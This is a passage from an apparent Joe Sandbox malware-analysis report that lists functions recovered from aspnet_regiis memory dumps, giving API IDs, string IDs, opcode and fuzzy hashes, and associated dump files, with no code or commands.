                                                                            • Opcode Fuzzy Hash: 2af4bac00a47341f0286deaa31c152fbff0a77ea8e8996c47ae50d0681933831
                                                                            • Instruction Fuzzy Hash: EA91182150DBC189E332C73C885879BBED12BA3224F088B9DD5ED9B2D2C7B90449C767
                                                                            Function 033C40F6 Relevance: 26.4, APIs: 1, Strings: 14, Instructions: 104COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2236254867.0000000003391000.00000020.00000400.00020000.00000000.sdmp, Offset: 03390000, based on PE: true
                                                                            • Associated: 00000003.00000002.2236239329.0000000003390000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236304038.00000000033D9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236321793.00000000033E9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3390000_aspnet_regiis.jbxd
                                                                            Similarity
                                                                            • API ID: InitVariant
                                                                            • String ID: @$A$C$E$G$I$K$M$O$q$s$u$w$y
                                                                            • API String ID: 1927566239-3739842773
                                                                            • Opcode ID: 79e693039503f0f46e481d73765be293c628cd13523e6d24926b6069280bd9ea
                                                                            • Instruction ID: d4619fb36ce6b7c96d6c7168957e0618e36c79898bf0b2481f47acfbcb332c3f
                                                                            • Opcode Fuzzy Hash: 79e693039503f0f46e481d73765be293c628cd13523e6d24926b6069280bd9ea
                                                                            • Instruction Fuzzy Hash: AF51567190C7C08AE325CB38845879EBFD16BD6324F184A9DE4E94B3E2C7B88945C753
                                                                            Function 033C42D4 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 94COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2236254867.0000000003391000.00000020.00000400.00020000.00000000.sdmp, Offset: 03390000, based on PE: true
                                                                            • Associated: 00000003.00000002.2236239329.0000000003390000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236304038.00000000033D9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236321793.00000000033E9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3390000_aspnet_regiis.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearInit
                                                                            • String ID: !$($-$-$2$3$7$8$=$?
                                                                            • API String ID: 2610073882-1101923984
                                                                            • Opcode ID: 703756b378ed8a8dba2b846e26f22346c9c2aee30b62685056ca37a55532439a
                                                                            • Instruction ID: 500dbdf56cfc3a7929b85db0c5074f774ca926900247b0df93636d5d8a00ed6e
                                                                            • Opcode Fuzzy Hash: 703756b378ed8a8dba2b846e26f22346c9c2aee30b62685056ca37a55532439a
                                                                            • Instruction Fuzzy Hash: 7841477150C7C18FD321DA3C884865EBFE16BA6324F094A9DE5E4873D2C7B58906C753
                                                                            Function 033ACBE6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 273threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 033ACCA3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2236254867.0000000003391000.00000020.00000400.00020000.00000000.sdmp, Offset: 03390000, based on PE: true
                                                                            • Associated: 00000003.00000002.2236239329.0000000003390000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236304038.00000000033D9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236321793.00000000033E9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3390000_aspnet_regiis.jbxd
                                                                            Similarity
                                                                            • API ID: ProcessThreadWindow
                                                                            • String ID: ;:54$TU
                                                                            • API String ID: 1653199695-2129887498
                                                                            • Opcode ID: 438c4aae6e059fe58b678ee99e17414b0b79ef5be70109e13d28e76f0cb04248
                                                                            • Instruction ID: 4f9dc3e7b1eb77255f02321ecb226e6eb79484b0671f8d1cd6d75f72f26be030
                                                                            • Opcode Fuzzy Hash: 438c4aae6e059fe58b678ee99e17414b0b79ef5be70109e13d28e76f0cb04248
                                                                            • Instruction Fuzzy Hash: F591D075609301CFDB14EF28E8C066BB7BAFF89715F0A896CE1848B254E734E955CB42
                                                                            Function 033C56A7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2236254867.0000000003391000.00000020.00000400.00020000.00000000.sdmp, Offset: 03390000, based on PE: true
                                                                            • Associated: 00000003.00000002.2236239329.0000000003390000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236304038.00000000033D9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236321793.00000000033E9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3390000_aspnet_regiis.jbxd
                                                                            Similarity
                                                                            • API ID: MetricsSystem
                                                                            • String ID:
                                                                            • API String ID: 4116985748-3916222277
                                                                            • Opcode ID: 0e1e88b7f6e31b635b73b25d0270667420ba0da76f22c810844c022d872bc707
                                                                            • Instruction ID: a77973ede6b33ae2e388459131ec10babd08bee59c6d1ca2c63c0019c01c00b9
                                                                            • Opcode Fuzzy Hash: 0e1e88b7f6e31b635b73b25d0270667420ba0da76f22c810844c022d872bc707
                                                                            • Instruction Fuzzy Hash: D1318EB09193049FDB40EF6DE985A1EBBF4BB88304F11852DE488DB354D774A958CB92